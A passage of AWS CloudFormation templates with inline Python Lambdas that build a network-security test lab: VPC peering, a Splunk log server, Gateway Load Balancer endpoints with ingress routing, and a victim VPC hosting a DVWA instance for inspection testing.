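          logger.setLevel(logging.INFO)

          client = boto3.client('ec2')
          BaseVPC = os.getenv("VPCID")
          BaseVPCcidr = os.getenv("VPCCIDR")
          BaseRTId = os.getenv("RTID")
          StackName = os.getenv("STACKNAME")

          def by_stack(tag='tag:aws:cloudformation:stack-name'):
              # filter: resources created by the NSVA security-VPC stack
              return [{'Name': tag, 'Values': [StackName]}]

          def nsva_vpcs():
              return client.describe_vpcs(Filters=by_stack())['Vpcs']

          def nsva_rt_ids():
              rts = client.describe_route_tables(Filters=by_stack())['RouteTables']
              return [rt['RouteTableId'] for rt in rts]

          def delete_route(rt_id, cidr):
              # idempotent: an already-deleted route must not block stack deletion
              try:
                  client.delete_route(RouteTableId=rt_id, DestinationCidrBlock=cidr)
              except ClientError as e:
                  if not e.response['Error']['Code'].endswith('NotFound'):
                      raise
                  logger.info('route %s in %s already gone', cidr, rt_id)

          def on_create():
              vpcs = nsva_vpcs()
              if not vpcs:
                  raise RuntimeError('no VPC tagged with stack-name ' + str(StackName))
              nsva_vpc, nsva_cidr = vpcs[0]['VpcId'], vpcs[0]['CidrBlock']
              pcx = client.create_vpc_peering_connection(
                  PeerVpcId=nsva_vpc, VpcId=BaseVPC,
                  TagSpecifications=[{'ResourceType': 'vpc-peering-connection',
                                      'Tags': [{'Key': 'StackName', 'Value': StackName}]}])
              pcx_id = pcx['VpcPeeringConnection']['VpcPeeringConnectionId']
              client.accept_vpc_peering_connection(VpcPeeringConnectionId=pcx_id)
              # NSVA side: every route table of the security VPC learns the base VPC
              for rt_id in nsva_rt_ids():
                  client.create_route(DestinationCidrBlock=BaseVPCcidr, RouteTableId=rt_id, VpcPeeringConnectionId=pcx_id)
              # base side: the given route table learns the security VPC
              client.create_route(DestinationCidrBlock=nsva_cidr, RouteTableId=BaseRTId, VpcPeeringConnectionId=pcx_id)

          def on_delete():
              # routes first, then the peering; a missing piece is skipped, not fatal
              vpcs = nsva_vpcs()
              if vpcs:
                  for rt_id in nsva_rt_ids():
                      delete_route(rt_id, BaseVPCcidr)
                  delete_route(BaseRTId, vpcs[0]['CidrBlock'])
              else:
                  logger.warning('security VPC of %s not found, skipping routes', StackName)
              pcxs = client.describe_vpc_peering_connections(
                  Filters=by_stack('tag:StackName'))['VpcPeeringConnections']
              for pcx in pcxs:
                  if pcx['Status']['Code'] not in ('deleted', 'deleting'):
                      client.delete_vpc_peering_connection(VpcPeeringConnectionId=pcx['VpcPeeringConnectionId'])

          def lambda_handler(event, context):
              logger.info("event: {}".format(event))
              status = cfnresponse.SUCCESS
              # stable physical id: a changing id makes CloudFormation send a Delete
              # for the "old" resource after every Update, tearing the peering down
              phys_id = event.get('PhysicalResourceId') or 'vpc-peering-' + str(StackName)
              try:
                  if event['RequestType'] == 'Create':
                      on_create()
                  elif event['RequestType'] == 'Delete':
                      on_delete()
                  # Update: nothing to change, the peering is keyed by the stack name
              except Exception:
                  logger.error('Unhandled exception', exc_info=True)
                  status = cfnresponse.FAILED
              finally:
                  cfnresponse.send(event, context, status, {}, phys_id)
      Role: !GetAtt CreateVPCpeeringLambdaRole.Arn
      Environment:
        Variables:
          VPCID: !Ref VPCID
          VPCCIDR: !Ref VPCCIDR
          RTID: !Ref RTID
          STACKNAME: !Ref c1nsStackName
      FunctionName: !Join ['', [!Select [2, !Split ['-', !Ref AWS::StackName]], '-CreateVPCpeering-Function']]
      Handler: index.lambda_handler
      MemorySize: 128
      # python3.7 (upstream) is past Lambda end-of-support and can no longer be
      # deployed; the inline code only needs boto3/botocore/cfnresponse, which
      # current runtimes provide as well.
      Runtime: python3.12
      Timeout: 300

  CreateVPCpeering:
    Type: AWS::CloudFormation::CustomResource
    Properties:
      ServiceToken: !GetAtt CreateVPCpeeringLambdaFunction.Arn

  # ------------------------------------------------------------#
  # Create Splunk Instance
  # ------------------------------------------------------------#
  SplunkSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupDescription: Security Group
      VpcId: !Ref VPCID
      # Only the two listener ports are opened; egress is the default allow-all.
      SecurityGroupIngress:
        # Splunk web UI (plain HTTP, see the SplunkURL output) - AllowIP only.
        - IpProtocol: tcp
          FromPort: 8000
          ToPort: 8000
          CidrIp: !Ref AllowIP
        # Syslog from the NSVA security VPC, which reaches us over the peering.
        - IpProtocol: tcp
          FromPort: !Ref SyslogPort
          ToPort: !Ref SyslogPort
          CidrIp: !Ref SecurityVPCCIDR
  Splunk:
    Type: AWS::EC2::Instance
    Properties:
      IamInstanceProfile: !If [NeedSSM, !Ref InstanceProfile, !Ref AWS::NoValue]
      ImageId: !Ref ImageId
      InstanceType: m5.large
      BlockDeviceMappings:
        - DeviceName: /dev/xvda
          Ebs:
            VolumeSize: 40
            VolumeType: gp3
            # Ingested NSVA events land on this volume; encrypt it at rest
            # (uses the account default EBS KMS key).
            Encrypted: true
      NetworkInterfaces:
        # Public instance so the operator can reach the web UI; the security
        # group limits who can. NOTE(review): AWS::EC2::Instance cannot require
        # IMDSv2 directly; a launch template would allow that and is worth it
        # when NeedSSMAccess attaches an instance profile.
        - AssociatePublicIpAddress: true
          DeviceIndex: 0
          GroupSet: [!Ref SplunkSecurityGroup]
          SubnetId: !Ref PublicSubnet1ID
      Tags:
        - Key: Name
          Value: Splunk
      UserData:
        Fn::Base64: !Sub |
          #!/bin/bash -x
          yum update -y
          yum install -y docker
          systemctl enable docker
          service docker start
          docker pull splunk/splunk:${SplunkVersion}
          # Stop tracing before the command that carries the admin password;
          # with -x still on, bash echoes it into /var/log/cloud-init-output.log.
          set +x
          # Single quotes: the substituted password must not be re-interpreted by
          # the shell (a '$' or '"' inside it would otherwise expand or break the
          # command). A password containing a single quote is still not supported.
          docker run -d -p 8000:8000 -p ${SyslogPort}:${SyslogPort}/tcp -e 'SPLUNK_START_ARGS=--accept-license' -e 'SPLUNK_PASSWORD=${SplunkPassword}' --name splunk splunk/splunk:${SplunkVersion}

Outputs:
  SplunkURL:
    # Plain HTTP: the login (and the admin password) cross the Internet in the
    # clear unless TLS is enabled on the Splunk web port. Keep AllowIP tight.
    Value: !Sub http://${Splunk.PublicDnsName}:8000
    Description: Splunk URL
  SplunkInternalIP:
    Value: !GetAtt Splunk.PrivateIp
    Description: Splunk private IP address
--------------------------------------------------------------------------------
/centralized-with-gwlb/templates/last.yaml:
--------------------------------------------------------------------------------
AWSTemplateFormatVersion: 2010-09-09

Parameters:
  # ------------------------------------------------------------#
  # Import Master.yaml template
  # ------------------------------------------------------------#
  AvailabilityZones:
    Description: 'List of Availability Zones to use for the subnets in the VPC. Select the AZ to deploy GWLB Endpoint. Note:
      The logical order is preserved.'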
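# (continuation of the AvailabilityZones parameter opened above)
    # NOTE(review): the rendered source shows a bare "List" here, which is not a
    # CloudFormation parameter type; the AZ-name list type is what the
    # description and the !Select calls below expect. Confirm against upstream.
    Type: List<AWS::EC2::AvailabilityZone::Name>
  PublicSubnet1CIDR:
    Description: Enter the Public Subnet CIDR to deploy the GWLBE, CIDR block for the public DMZ subnet 1 located in Availability Zone 1
    Type: String
    AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/(1[6-9]|2[0-8]))$
    ConstraintDescription: CIDR block parameter must be in the form x.x.x.x/16-28
    Default: 10.0.201.0/24
  PublicSubnet2CIDR:
    Description: Enter the Public Subnet CIDR to deploy the GWLBE, CIDR block for the public DMZ subnet 2 located in Availability Zone 2
    Type: String
    AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/(1[6-9]|2[0-8]))$
    ConstraintDescription: CIDR block parameter must be in the form x.x.x.x/16-28
    Default: 10.0.202.0/24
  # Up to three optional Key=Value tags applied to both GWLBE subnets.
  PublicSubnetTag1:
    Description: tag to add to public subnets, in format Key=Value (Optional)
    Type: String
    AllowedPattern: ^([a-zA-Z0-9+\-._:/@]+=[a-zA-Z0-9+\-.,_:/@ *\\"'\[\]\{\}]*)?$
    ConstraintDescription: tags must be in format "Key=Value" keys can only contain [a-zA-Z0-9+\-._:/@], values can contain [a-zA-Z0-9+\-._:/@ *\\"'\[\]\{\}]
    Default: Network=Public
  PublicSubnetTag2:
    Description: tag to add to public subnets, in format Key=Value (Optional)
    Type: String
    AllowedPattern: ^([a-zA-Z0-9+\-._:/@]+=[a-zA-Z0-9+\-.,_:/@ *\\"'\[\]\{\}]*)?$
    ConstraintDescription: tags must be in format "Key=Value" keys can only contain [a-zA-Z0-9+\-._:/@], values can contain [a-zA-Z0-9+\-._:/@ *\\"'\[\]\{\}]
    Default: ''
  PublicSubnetTag3:
    Description: tag to add to public subnets, in format Key=Value (Optional)
    Type: String
    AllowedPattern: ^([a-zA-Z0-9+\-._:/@]+=[a-zA-Z0-9+\-.,_:/@ *\\"'\[\]\{\}]*)?$
    ConstraintDescription: tags must be in format "Key=Value" keys can only contain [a-zA-Z0-9+\-._:/@], values can contain [a-zA-Z0-9+\-._:/@ *\\"'\[\]\{\}]
    Default: ''
  # ------------------------------------------------------------#
  # Import BaseVPC stack(aws-vpc.template.yaml file)
  # ------------------------------------------------------------#
  VPC:
    Description: Enter the VPC ID where you want to deploy the GWLB Endpoint
    Type: String
  InternetGateway:
    Description: IGW ID of the VPC where the GWLBE is deployed
    Type: String
  BasePublicSubnet1CIDR:
    Description: Enter the Public Subnet CIDR that was originally deployed
    Type: String
  BasePublicSubnet2CIDR:
    Description: Enter the Public Subnet CIDR that was originally deployed
    Type: String
  BasePublicSubnet1RouteTable:
    Description: Enter the Public Subnet Route Table ID that was originally deployed
    Type: String
  BasePublicSubnet2RouteTable:
    Description: Enter the Public Subnet Route Table ID that was originally deployed
    Type: String
  # ------------------------------------------------------------#
  # Import c1nsSecurityVPCTemplate stack(security_vpc.yml file)
  # ------------------------------------------------------------#
  VPCEndpointServiceName:
    Description: VPC Endpoint Service Name
    Type: String

# ------------------------------------------------------------#
# Conditions
# ------------------------------------------------------------#
Conditions:
  # A tag parameter is applied only when it is non-empty.
  PublicSubnetTag1Condition: !Not [!Equals [!Ref PublicSubnetTag1, '']]
  PublicSubnetTag2Condition: !Not [!Equals [!Ref PublicSubnetTag2, '']]
  PublicSubnetTag3Condition: !Not [!Equals [!Ref PublicSubnetTag3, '']]

Resources:
  # ------------------------------------------------------------#
  # Create Public Subnet for GWLB Endpoint (one per AZ)
  # ------------------------------------------------------------#
  PublicSubnet1:
    Type: AWS::EC2::Subnet
    Properties:
      VpcId: !Ref VPC
      CidrBlock: !Ref PublicSubnet1CIDR
      AvailabilityZone: !Select [0, !Ref AvailabilityZones]
      Tags:
        - Key: Name
          Value: Public subnet 1
        # Optional Key=Value tags from the parameters; dropped when empty.
        - !If
          - PublicSubnetTag1Condition
          - Key: !Select [0, !Split ['=', !Ref PublicSubnetTag1]]
            Value: !Select [1, !Split ['=', !Ref PublicSubnetTag1]]
          - !Ref AWS::NoValue
        - !If
          - PublicSubnetTag2Condition
          - Key: !Select [0, !Split ['=', !Ref PublicSubnetTag2]]
            Value: !Select [1, !Split ['=', !Ref PublicSubnetTag2]]
          - !Ref AWS::NoValue
        - !If
          - PublicSubnetTag3Condition
          - Key: !Select [0, !Split ['=', !Ref PublicSubnetTag3]]
            Value: !Select [1, !Split ['=', !Ref PublicSubnetTag3]]
          - !Ref AWS::NoValue
      # NOTE(review): only GWLB endpoint ENIs are meant to live here and they
      # never receive a public IP, so this flag only matters if something is
      # launched into the subnet by hand; "false" is the least-privilege value.
      MapPublicIpOnLaunch: true
  PublicSubnet2:
    Type: AWS::EC2::Subnet
    Properties:
      VpcId: !Ref VPC
      CidrBlock: !Ref PublicSubnet2CIDR
      AvailabilityZone: !Select [1, !Ref AvailabilityZones]
      Tags:
        - Key: Name
          Value: Public subnet 2
        - !If
          - PublicSubnetTag1Condition
          - Key: !Select [0, !Split ['=', !Ref PublicSubnetTag1]]
            Value: !Select [1, !Split ['=', !Ref PublicSubnetTag1]]
          - !Ref AWS::NoValue
        - !If
          - PublicSubnetTag2Condition
          - Key: !Select [0, !Split ['=', !Ref PublicSubnetTag2]]
            Value: !Select [1, !Split ['=', !Ref PublicSubnetTag2]]
          - !Ref AWS::NoValue
        - !If
          - PublicSubnetTag3Condition
          - Key: !Select [0, !Split ['=', !Ref PublicSubnetTag3]]
            Value: !Select [1, !Split ['=', !Ref PublicSubnetTag3]]
          - !Ref AWS::NoValue
      # See the note on PublicSubnet1.
      MapPublicIpOnLaunch: true

  # ------------------------------------------------------------#
  # Route tables for the GWLBE subnets: default route straight to the IGW
  # ------------------------------------------------------------#
  PublicSubnet1RouteTable:
    Type: AWS::EC2::RouteTable
    Properties:
      VpcId: !Ref VPC
      Tags:
        - Key: Name
          Value: ForPublicSubnet1RouteTable
  PublicSubnet1Route:
    Type: AWS::EC2::Route
    Properties:
      RouteTableId: !Ref PublicSubnet1RouteTable
      DestinationCidrBlock: 0.0.0.0/0
      GatewayId: !Ref InternetGateway
  PublicSubnet1RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      SubnetId: !Ref PublicSubnet1
      RouteTableId: !Ref PublicSubnet1RouteTable

  PublicSubnet2RouteTable:
    Type: AWS::EC2::RouteTable
    Properties:
      VpcId: !Ref VPC
      Tags:
        - Key: Name
          Value: ForPublicSubnet2RouteTable
  PublicSubnet2Route:
    Type: AWS::EC2::Route
    Properties:
      RouteTableId: !Ref PublicSubnet2RouteTable
      DestinationCidrBlock: 0.0.0.0/0
      GatewayId: !Ref InternetGateway
  PublicSubnet2RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      SubnetId: !Ref PublicSubnet2
      RouteTableId: !Ref PublicSubnet2RouteTable

  # ------------------------------------------------------------#
  # Create GWLB Endpoint (towards the NSVA endpoint service), one per AZ
  # ------------------------------------------------------------#
  GWLBEndopoint1:  # sic - logical id kept, the VIR routes below reference it
    Type: AWS::EC2::VPCEndpoint
    Properties:
      ServiceName: !Ref VPCEndpointServiceName
      SubnetIds: [!Ref PublicSubnet1]
      VpcEndpointType: GatewayLoadBalancer
      VpcId: !Ref VPC

  GWLBEndopoint2:  # sic
    Type: AWS::EC2::VPCEndpoint
    Properties:
      ServiceName: !Ref VPCEndpointServiceName
      SubnetIds: [!Ref PublicSubnet2]
      VpcEndpointType: GatewayLoadBalancer
      VpcId: !Ref VPC

  # ------------------------------------------------------------#
  # Create VPC Ingress Routing: traffic entering from the IGW towards the two
  # base public subnets is steered through the GWLB endpoint of the same AZ,
  # so the NSVA inspects it before it reaches the workloads.
  # NOTE(review): only those two CIDRs are covered; any other public subnet
  # in this VPC keeps the direct, uninspected IGW path.
  # ------------------------------------------------------------#
  VIRRouteTable:
    Type: AWS::EC2::RouteTable
    Properties:
      VpcId: !Ref VPC
      Tags:
        - Key: Name
          Value: ForVIRRouteTable
  VIR1Route:
    Type: AWS::EC2::Route
    Properties:
      RouteTableId: !Ref VIRRouteTable
      DestinationCidrBlock: !Ref BasePublicSubnet1CIDR
      VpcEndpointId: !Ref GWLBEndopoint1

  VIR2Route:
    Type: AWS::EC2::Route
    Properties:
      RouteTableId: !Ref VIRRouteTable
      DestinationCidrBlock: !Ref BasePublicSubnet2CIDR
      VpcEndpointId: !Ref GWLBEndopoint2

  VIR:
    Type: AWS::EC2::GatewayRouteTableAssociation
    Properties:
      GatewayId: !Ref InternetGateway
      RouteTableId: !Ref VIRRouteTable

  # ------------------------------------------------------------#
  # Create Lambda for modify base route table
  # ------------------------------------------------------------#
  ModifyRouteTableLambdaRole:
    Type: AWS::IAM::Role
    Properties:
      Path: "/"
      # Select 2 assumes the nested-stack name shape Parent-LogicalId-Suffix.
      RoleName: !Join ['', [!Select [2, !Split ['-', !Ref AWS::StackName]], '-ModifyRouteTableLambdaRole']]
      AssumeRolePolicyDocument:
        Version: 2012-10-17
        Statement:
          - Effect: Allow
            Principal:
              Service: [lambda.amazonaws.com]
            Action: [sts:AssumeRole]
      MaxSessionDuration: 3600
      ManagedPolicyArns:
        - arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole
        - !Ref ModifyRouteTableLambdaPolicy

  ModifyRouteTableLambdaPolicy:
    Type: "AWS::IAM::ManagedPolicy"
    Properties:
      ManagedPolicyName:
        Fn::Join:
          - ""
          - - Fn::Select:
                - 2
                - Fn::Split:
                    - "-"
                    - !Ref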
AWS::StackName 331 | - "-ModifyRouteTableLambdaPolicy" 332 | Path: / 333 | PolicyDocument: 334 | Version: 2012-10-17 335 | Statement: 336 | - Action: 337 | - ec2:ReplaceRoute 338 | Resource: "*" 339 | Effect: Allow 340 | 341 | ModifyRouteTableLambdaFunction: 342 | Type: AWS::Lambda::Function 343 | Properties: 344 | Code: 345 | ZipFile: | 346 | import json, boto3, logging 347 | import cfnresponse 348 | import os 349 | logger = logging.getLogger() 350 | logger.setLevel(logging.INFO) 351 | 352 | destination_cidr_block = "0.0.0.0/0" 353 | 354 | igw = os.getenv('IGW') 355 | route_table_id1 = os.getenv('RT1') 356 | VpcEndpointId1 = os.getenv('GWLBE1') 357 | route_table_id2 = os.getenv('RT2') 358 | VpcEndpointId2 = os.getenv('GWLBE2') 359 | ec2 = boto3.resource('ec2') 360 | route1 = ec2.Route(route_table_id1,destination_cidr_block) 361 | route2 = ec2.Route(route_table_id2,destination_cidr_block) 362 | 363 | def lambda_handler(event, context): 364 | logger.info("event: {}".format(event)) 365 | status = cfnresponse.SUCCESS 366 | try: 367 | if event['RequestType'] == 'Create': 368 | route1.replace( 369 | VpcEndpointId=VpcEndpointId1 370 | ) 371 | route2.replace( 372 | VpcEndpointId=VpcEndpointId2 373 | ) 374 | if event['RequestType'] == 'Delete': 375 | route1.replace( 376 | GatewayId=igw 377 | ) 378 | route2.replace( 379 | GatewayId=igw 380 | ) 381 | except Exception: 382 | logger.error('Unhandled exception', exc_info=True) 383 | status = cfnresponse.FAILED 384 | finally: 385 | cfnresponse.send(event, context, status, {}, None) 386 | Role: !GetAtt ModifyRouteTableLambdaRole.Arn 387 | Environment: 388 | Variables: 389 | IGW: !Ref InternetGateway 390 | RT1: !Ref BasePublicSubnet1RouteTable 391 | GWLBE1: !Ref GWLBEndopoint1 392 | RT2: !Ref BasePublicSubnet2RouteTable 393 | GWLBE2: !Ref GWLBEndopoint2 394 | FunctionName: 395 | Fn::Join: 396 | - "" 397 | - - Fn::Select: 398 | - 2 399 | - Fn::Split: 400 | - "-" 401 | - !Ref AWS::StackName 402 | - "-ModifyRouteTable-Function" 403 | 
Handler: index.lambda_handler 404 | MemorySize: 128 405 | Runtime: python3.7 406 | Timeout: 300 407 | 408 | ModifyRouteTable: 409 | Type: AWS::CloudFormation::CustomResource 410 | Properties: 411 | ServiceToken: !GetAtt ModifyRouteTableLambdaFunction.Arn 412 | 413 | Outputs: 414 | PublicSubnet1Route: 415 | Description: ID of Public Subnet 1 Route Table 416 | Value: !Ref PublicSubnet1RouteTable 417 | PublicSubnet1ID: 418 | Description: ID of Public Subnet 1 419 | Value: !Ref PublicSubnet1 -------------------------------------------------------------------------------- /east-west-deployment/templates/Master.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Mappings: 4 | RegionMap: 5 | ap-northeast-1: 6 | ImageId: "ami-05f01a6a414be9808" 7 | HostedId: "Z1YSHQZHG15GKL" 8 | ap-northeast-2: 9 | ImageId: "ami-06835923fab139b98" 10 | HostedId: "Z20JF4UZKIW1U8" 11 | ap-northeast-3: 12 | ImageId: "ami-081eaee471c0e1518" 13 | HostedId: "Z5LXEXXYW11ES" 14 | us-east-2: 15 | ImageId: "ami-0233c2d874b811deb" 16 | HostedId: "ZOJJZC49E0EPZ" 17 | us-east-1: 18 | ImageId: "ami-0dc2d3e4c0f9ebd18" 19 | HostedId: "Z1UJRXOUMOOFQ8" 20 | us-west-1: 21 | ImageId: "ami-0ed05376b59b90e46" 22 | HostedId: "Z2MUQ32089INYE" 23 | us-west-2: 24 | ImageId: "ami-0dc8f589abe99f538" 25 | HostedId: "Z2OJLYMUO9EFXC" 26 | ap-south-1: 27 | ImageId: "ami-00bf4ae5a7909786c" 28 | HostedId: "Z3VO1THU9YC4UR" 29 | ap-southeast-1: 30 | ImageId: "ami-0e5182fad1edfaa68" 31 | HostedId: "ZL327KTPIQFUL" 32 | ap-southeast-2: 33 | ImageId: "ami-0c9fe0dec6325a30c" 34 | HostedId: "Z2RPCDW04V8134" 35 | ca-central-1: 36 | ImageId: "ami-0db72f413fc1ddb2a" 37 | HostedId: "Z19DQILCV0OWEC" 38 | eu-central-1: 39 | ImageId: "ami-00f22f6155d6d92c5" 40 | HostedId: "Z1U9ULNL0V5AJ3" 41 | eu-west-1: 42 | ImageId: "ami-058b1b7fe545997ae" 43 | HostedId: "ZLY8HYME6SFDD" 44 | eu-west-2: 45 | ImageId: "ami-03ac5a9b225e99b02" 46 | HostedId: "ZJ5UAJN8Y3Z2Q" 
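# (continuation of Mappings.RegionMap from the previous line)
    eu-west-3:
      ImageId: "ami-062fdd189639d3e93"
      HostedId: "Z3KY65QIEKYHQQ"
    eu-north-1:
      ImageId: "ami-00517306b63c4628c"
      HostedId: "Z3UWIKFBOOGXPP"
    sa-east-1:
      ImageId: "ami-0f8243a5175208e08"
      HostedId: "ZCMLWB8V5SYIT"
    # ap-east-1:
    #   HostedId: "Z3FD1VL90ND7K5"
    # me-south-1:
    #   HostedId: "Z20ZBPC0SS8806"

  # Cloud One Network Security virtual appliance (NSVA) AMI per region.
  NSVAAMIRegionMap:
    # IPS_AMI--2021.7.0.11129
    us-east-1:
      ImageId: ami-0c55b11b8c1850074
    us-east-2:
      ImageId: ami-049ac6c43ccc0eb59
    us-west-1:
      ImageId: ami-0c61fb7ad31615bc9
    us-west-2:
      ImageId: ami-0abee844f98a90719
    # Fixed: the region code is "af-south-1"; the former "af-south1" key could
    # never match AWS::Region, so FindInMap failed for every Cape Town deployment.
    af-south-1:
      ImageId: ami-07beb2f931b25bac4
    ap-east-1:
      ImageId: ami-0eef4c54b43719b15
    ap-south-1:
      ImageId: ami-0bb4faee68f7cbd25
    # NOTE(review): these two entries are identical to the base-site AMIs in
    # RegionMap above (ami-06835923fab139b98 / ami-05f01a6a414be9808); confirm
    # they really are the NSVA images for ap-northeast-1/2.
    ap-northeast-2:
      ImageId: ami-06835923fab139b98
    ap-northeast-1:
      ImageId: ami-05f01a6a414be9808
    ap-southeast-1:
      ImageId: ami-08c9d7bc95ea77e79
    ap-southeast-2:
      ImageId: ami-095df8b8ec0e0aac5
    ca-central-1:
      ImageId: ami-0c1c1a2c0b54eea1e
    eu-north-1:
      ImageId: ami-0c3ba132507949f56
    eu-west-3:
      ImageId: ami-02c47030c3e886b4f
    eu-west-2:
      ImageId: ami-062e147780edfffc4
    eu-west-1:
      ImageId: ami-0c0a077459b3222d9
    eu-central-1:
      ImageId: ami-039d4a40e711415db
    eu-south-1:
      ImageId: ami-001fe5ed24c292c15
    me-south-1:
      ImageId: ami-036c40a2988da6da7
    sa-east-1:
      ImageId: ami-0edc19454ec876784

Metadata:
  AWS::CloudFormation::Interface:
    ParameterGroups:
      - Label:
          default: Required parameters
        Parameters:
          - AllowIP
          - BucketName
          - BucketPrefix
          - BucketRegion
          - DVWAInstanceType
          - sshKeyPairName
          - SSMAccess
          - DeployC1NS
      - Label:
          default: If you set the DeployC1NS parameter to true, the following parameters are required
        Parameters:
          - CloudOneAPIKEY
          - InstanceType
          - SecurityVPCCIDR
          - NsvaCountPerAz
          - EnableInspectionLogs

Parameters:
  # ------------------------------------------------------------#
  # Required parameters
  # ------------------------------------------------------------#
  # Source CIDR that the nested stacks allow in to the demo hosts (passed as
  # AllowIP / DVWARemoteAccessCIDR below). Keep it as narrow as possible: the
  # DVWA host is intentionally vulnerable and sits in a public subnet.
  AllowIP:
    Description: Enter the global IP of the terminal to be tested
    Type: String
    # Octets limited to 0-255 and the prefix to 0-32. The previous
    # \d{1,3}/\d{1,2} pattern accepted values such as 999.1.1.1/99 that can
    # only fail later, when a nested stack tries to use them.
    AllowedPattern: "^((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])/(3[0-2]|[12]?[0-9])$"
    ConstraintDescription: "Must be a valid IPv4 CIDR of the form x.x.x.x/0-32"
    # Loopback by default, i.e. nobody is allowed in until the operator sets it.
    Default: '127.0.0.1/32'
  # Location of the nested templates (aws-vpc.template.yaml, BaseSite.yaml,
  # dvwa.yaml, last.yaml). Anyone who can write to this bucket controls what
  # the nested stacks deploy.
  BucketName:
    Description: Name of the bucket where the template is placed
    Type: String
    Default: 'quickstart-network-security'
  BucketPrefix:
    Description: Bucket prefix
    Type: String
    Default: 'east-west-deployment/'
  BucketRegion:
    Description: Bucket region
    Type: String
    Default: 'us-west-1'
  DVWAInstanceType:
    AllowedValues:
      - t2.nano
      - t2.micro
      - t2.small
      - t2.medium
      - t2.large
      - t3.micro
      - t3.small
      - t3.medium
      - t3.large
      - t3.xlarge
      - t3.2xlarge
      - m3.large
      - m3.xlarge
      - m3.2xlarge
      - m4.large
      - m4.xlarge
      - m4.2xlarge
      - m4.4xlarge
    Default: t3.micro
    Description: "Amazon EC2 instance type for the DVWA instances. Damn Vulnerable Web
      Application (DVWA) hosts are machines placed in the public subnet which are PHP/MySQL Web App and are vulnerable.
      This allows security professionals to test Network Security in a legal
      environment. For more information visit: https://dvwa.co.uk/"
    Type: String
  sshKeyPairName:
    Description: SSH Key of the EC2 you are using
    Type: AWS::EC2::KeyPair::KeyName
    ConstraintDescription: Must be the name of an existing EC2 KeyPair
  SSMAccess:
    Description: If enabled, SSM access to the instance will be available.
    Type: String
    AllowedValues: [true, false]
    Default: true
  DeployC1NS:
    Description: If enabled, C1NS with be deployed in centralized Security VPC
    Type: String
    AllowedValues: [true, false]
    Default: true
  # ------------------------------------------------------------#
  # If you set the DeployC1NS parameter to true, the following parameters are required
  # ------------------------------------------------------------#
  # NoEcho hides the value in this stack's parameter list; the nested
  # security-VPC template it is forwarded to must declare NoEcho as well, or the
  # key is visible in the nested stack's parameters.
  CloudOneAPIKEY:
    Description: Trend Micro Cloud One API key you want to use.
    Type: String
    NoEcho: true
  InstanceType:
    Description: Instance type of NSVA
    Type: String
    AllowedValues:
      - c5.9xlarge
      - c5.4xlarge
      - c5.2xlarge
      - c5n.9xlarge
      - c5n.4xlarge
      - c5n.2xlarge
    Default: c5n.2xlarge
  SecurityVPCCIDR:
    Description: CIDR of the VPC where you want to deploy the NSVA.
    Type: String
    AllowedPattern: "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\\/(1[6-9]|2[0-6]))$"
    ConstraintDescription: "CIDR block parameter must be in the form x.x.x.x/16-26"
    # NOTE(review): 10.10.10.0/16 has host bits set (the /16 network is
    # 10.10.0.0/16). EC2 normally rejects non-canonical VPC CIDRs -- confirm
    # against security_vpc_legacy.yaml or change the default to 10.10.0.0/16.
    Default: "10.10.10.0/16"
  NsvaCountPerAz:
    Description: Number of NSVA instances to be deployed in the AZ.
    Type: Number
    AllowedValues:
      - 1
      - 2
      - 3
      - 4
    Default: 1
  EnableInspectionLogs:
    Description: If enabled, NSVA Inspection Logs will be published to CloudWatch log group "network_security_logs".
    Type: String
    AllowedValues: [ true, false ]
    Default: false
# ------------------------------------------------------------#
# Conditions
# ------------------------------------------------------------#
Conditions:
  DeployC1NS: !Equals [true, !Ref DeployC1NS]

Resources:
  # ------------------------------------------------------------#
  # Create Victim VPC (VPC, IGW, Subnet, RouteTable, EIP, NatGW)
  # ------------------------------------------------------------#
  VictimVpc:
    Type: AWS::CloudFormation::Stack
    Properties:
      TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/aws-vpc.template.yaml
      Parameters:
        VPCCIDR: 192.168.0.0/16
        PrivateSubnet1ACIDR: 192.168.1.0/24
        PrivateSubnet2ACIDR: 192.168.2.0/24
        PublicSubnet1CIDR: 192.168.11.0/24
        PublicSubnet2CIDR: 192.168.12.0/24
        NumberOfAZs: 2
        # First two AZs of the deployment region, as "az1,az2".
        AvailabilityZones: !Join
          - ","
          - - !Select
              - 0
              - Fn::GetAZs: !Ref AWS::Region
            - !Select
              - 1
              - Fn::GetAZs: !Ref AWS::Region
  # ------------------------------------------------------------#
  # Create Victim Site (EC2, SecurityGroup)
  # ------------------------------------------------------------#
  # The victim web server accepts traffic from the attacker VPC CIDR only.
  Victim:
    Type: AWS::CloudFormation::Stack
    Properties:
      TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/BaseSite.yaml
      Parameters:
        ImageId: !FindInMap [RegionMap, !Ref 'AWS::Region', ImageId]
        AllowIP: !Ref AllowIP
        NeedSSMAccess: !Ref SSMAccess
        VPCId: !GetAtt VictimVpc.Outputs.VPCID
        PrivateSubnet1ID: !GetAtt VictimVpc.Outputs.PrivateSubnet1AID
        WebServerIngressAllowCIDR: 172.16.0.0/16
  # ------------------------------------------------------------#
  # Create DVWA (DVWA Instance)
  # ------------------------------------------------------------#
  # Intentionally vulnerable host in the victim VPC's public subnet; remote
  # access is restricted to AllowIP.
  DVWA:
    Type: AWS::CloudFormation::Stack
    Properties:
      TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/dvwa.yaml
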